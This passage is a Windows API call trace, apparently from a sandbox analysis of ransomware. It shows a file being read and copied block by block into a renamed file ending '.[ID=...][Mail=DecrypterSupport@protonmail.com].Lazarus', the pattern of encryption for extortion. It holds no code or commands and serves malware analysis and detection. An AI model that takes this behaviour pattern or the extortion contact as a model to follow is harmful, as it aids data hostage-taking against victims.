InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0066.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0066.557] AreFileApisANSI () returned 1 [0066.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0066.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0066.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0066.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0066.558] AreFileApisANSI () returned 1 [0066.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0066.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 45 [0066.558] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.558] GetFileType (hFile=0x428) returned 0x1 [0066.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0066.558] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0066.558] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0066.558] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0066.558] CloseHandle (hObject=0x428) returned 1 [0066.559] AreFileApisANSI () returned 1 [0066.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0066.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 45 [0066.559] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.559] GetFileType (hFile=0x428) returned 0x1 [0066.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0066.559] CloseHandle (hObject=0x428) returned 1 [0066.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0066.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0066.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0066.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0066.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0066.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0066.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0066.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0066.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0066.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0066.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0066.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0066.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0066.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0066.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0066.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0066.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0066.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0066.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0066.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0066.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0066.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0066.560] AreFileApisANSI () returned 1 [0066.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0066.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 45 [0066.560] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x14412)) returned 1 [0066.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0066.560] AreFileApisANSI () returned 1 [0066.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0066.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0066.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0066.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0066.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0066.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0066.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0066.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0066.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0066.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0066.560] GetLastError () returned 0x0 [0066.560] SetLastError (dwErrCode=0x0) [0066.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4de70 [0066.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8a210 [0066.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0066.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0066.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0066.561] GetLastError () returned 0x0 [0066.561] SetLastError (dwErrCode=0x0) [0066.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0066.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71758 [0066.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0066.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0066.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0066.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0066.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0066.561] AreFileApisANSI () returned 1 [0066.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0066.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0066.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0066.561] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.561] GetFileType (hFile=0x428) returned 0x1 [0066.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0066.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0066.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0066.562] AreFileApisANSI () returned 1 [0066.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71bd0 [0066.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 45 [0066.562] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.563] GetFileType (hFile=0x420) returned 0x1 [0066.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0066.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0066.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.563] GetLastError () returned 0x0 [0066.563] SetLastError (dwErrCode=0x0) [0066.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.563] GetLastError () returned 0x0 [0066.563] SetLastError (dwErrCode=0x0) [0066.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0066.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0066.563] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0066.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0066.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0066.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0066.565] GetLastError () returned 0x0 [0066.565] SetLastError (dwErrCode=0x0) [0066.565] GetLastError () returned 0x0 [0066.565] SetLastError (dwErrCode=0x0) [0066.566] GetLastError () returned 0x0 [0066.566] SetLastError (dwErrCode=0x0) [0066.566] GetLastError () returned 0x0 [0066.566] SetLastError (dwErrCode=0x0) [0066.566] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.566] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.568] GetLastError () returned 0x0 [0066.568] SetLastError (dwErrCode=0x0) [0066.568] GetLastError () returned 0x0 [0066.568] SetLastError (dwErrCode=0x0) [0066.568] GetLastError () returned 0x0 [0066.568] SetLastError (dwErrCode=0x0) [0066.568] GetLastError () returned 0x0 [0066.568] SetLastError (dwErrCode=0x0) [0066.568] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.569] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.569] GetLastError () returned 0x0 [0066.569] SetLastError (dwErrCode=0x0) [0066.569] GetLastError () returned 0x0 [0066.569] SetLastError (dwErrCode=0x0) [0066.569] GetLastError () returned 0x0 [0066.569] SetLastError (dwErrCode=0x0) [0066.569] GetLastError () returned 0x0 [0066.569] SetLastError (dwErrCode=0x0) [0066.569] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.569] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.570] GetLastError () returned 0x0 [0066.570] SetLastError (dwErrCode=0x0) [0066.570] GetLastError () returned 0x0 [0066.570] SetLastError (dwErrCode=0x0) [0066.570] GetLastError () returned 0x0 [0066.570] SetLastError (dwErrCode=0x0) [0066.570] GetLastError () returned 0x0 [0066.570] SetLastError (dwErrCode=0x0) [0066.570] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.570] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.571] GetLastError () returned 0x0 [0066.571] SetLastError (dwErrCode=0x0) [0066.571] GetLastError () returned 0x0 [0066.571] SetLastError (dwErrCode=0x0) [0066.571] GetLastError () returned 0x0 [0066.571] SetLastError (dwErrCode=0x0) [0066.571] GetLastError () returned 0x0 [0066.571] SetLastError (dwErrCode=0x0) [0066.571] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.571] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.571] GetLastError () returned 0x0 [0066.571] SetLastError (dwErrCode=0x0) [0066.572] GetLastError () returned 0x0 [0066.572] SetLastError (dwErrCode=0x0) [0066.572] GetLastError () returned 0x0 [0066.572] SetLastError (dwErrCode=0x0) [0066.572] GetLastError () returned 0x0 [0066.572] SetLastError (dwErrCode=0x0) [0066.572] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.572] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.572] GetLastError () returned 0x0 [0066.572] SetLastError (dwErrCode=0x0) [0066.572] GetLastError () returned 0x0 [0066.573] SetLastError (dwErrCode=0x0) [0066.573] GetLastError () returned 0x0 [0066.573] SetLastError (dwErrCode=0x0) [0066.573] GetLastError () returned 0x0 [0066.573] SetLastError (dwErrCode=0x0) [0066.573] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.573] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.573] GetLastError () returned 0x0 [0066.573] SetLastError (dwErrCode=0x0) [0066.573] GetLastError () returned 0x0 [0066.573] SetLastError (dwErrCode=0x0) [0066.573] GetLastError () returned 0x0 [0066.573] SetLastError (dwErrCode=0x0) [0066.574] GetLastError () returned 0x0 [0066.574] SetLastError (dwErrCode=0x0) [0066.574] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.574] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.574] GetLastError () returned 0x0 [0066.574] SetLastError (dwErrCode=0x0) [0066.574] GetLastError () returned 0x0 [0066.574] SetLastError (dwErrCode=0x0) [0066.574] GetLastError () returned 0x0 [0066.574] SetLastError (dwErrCode=0x0) [0066.574] GetLastError () returned 0x0 [0066.575] SetLastError (dwErrCode=0x0) [0066.575] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.575] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.575] GetLastError () returned 0x0 [0066.575] SetLastError (dwErrCode=0x0) [0066.575] GetLastError () returned 0x0 [0066.575] SetLastError (dwErrCode=0x0) [0066.575] GetLastError () returned 0x0 [0066.575] SetLastError (dwErrCode=0x0) [0066.575] GetLastError () returned 0x0 [0066.575] SetLastError (dwErrCode=0x0) [0066.576] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.576] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.576] GetLastError () returned 0x0 [0066.576] SetLastError (dwErrCode=0x0) [0066.576] GetLastError () returned 0x0 [0066.576] SetLastError (dwErrCode=0x0) [0066.576] GetLastError () returned 0x0 [0066.576] SetLastError (dwErrCode=0x0) [0066.576] GetLastError () returned 0x0 [0066.576] SetLastError (dwErrCode=0x0) [0066.576] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.577] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.577] GetLastError () returned 0x0 [0066.577] SetLastError (dwErrCode=0x0) [0066.577] GetLastError () returned 0x0 [0066.577] SetLastError (dwErrCode=0x0) [0066.577] GetLastError () returned 0x0 [0066.577] SetLastError (dwErrCode=0x0) [0066.577] GetLastError () returned 0x0 [0066.577] SetLastError (dwErrCode=0x0) [0066.577] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.577] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.578] GetLastError () returned 0x0 [0066.578] SetLastError (dwErrCode=0x0) [0066.578] GetLastError () returned 0x0 [0066.578] SetLastError (dwErrCode=0x0) [0066.578] GetLastError () returned 0x0 [0066.578] SetLastError (dwErrCode=0x0) [0066.578] GetLastError () returned 0x0 [0066.578] SetLastError (dwErrCode=0x0) [0066.578] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.578] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.579] GetLastError () returned 0x0 [0066.579] SetLastError (dwErrCode=0x0) [0066.579] GetLastError () returned 0x0 [0066.579] SetLastError (dwErrCode=0x0) [0066.579] GetLastError () returned 0x0 [0066.579] SetLastError (dwErrCode=0x0) [0066.579] GetLastError () returned 0x0 [0066.579] SetLastError (dwErrCode=0x0) [0066.579] ReadFile (in: hFile=0x420, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.579] WriteFile (in: hFile=0x428, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.579] GetLastError () returned 0x0 [0066.579] SetLastError (dwErrCode=0x0) [0066.580] GetLastError () returned 0x0 [0066.580] SetLastError (dwErrCode=0x0) [0066.580] GetLastError () returned 0x0 [0066.580] SetLastError (dwErrCode=0x0) 